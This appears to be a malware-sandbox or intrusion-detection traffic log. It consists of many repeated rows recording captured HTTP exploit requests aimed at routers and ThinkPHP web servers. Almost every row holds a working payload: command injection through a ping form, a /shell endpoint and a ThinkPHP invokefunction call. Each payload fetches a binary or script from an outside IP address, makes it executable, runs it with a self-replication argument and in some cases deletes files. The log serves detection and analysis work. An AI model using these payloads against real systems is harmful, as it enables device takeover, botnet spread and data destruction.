| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
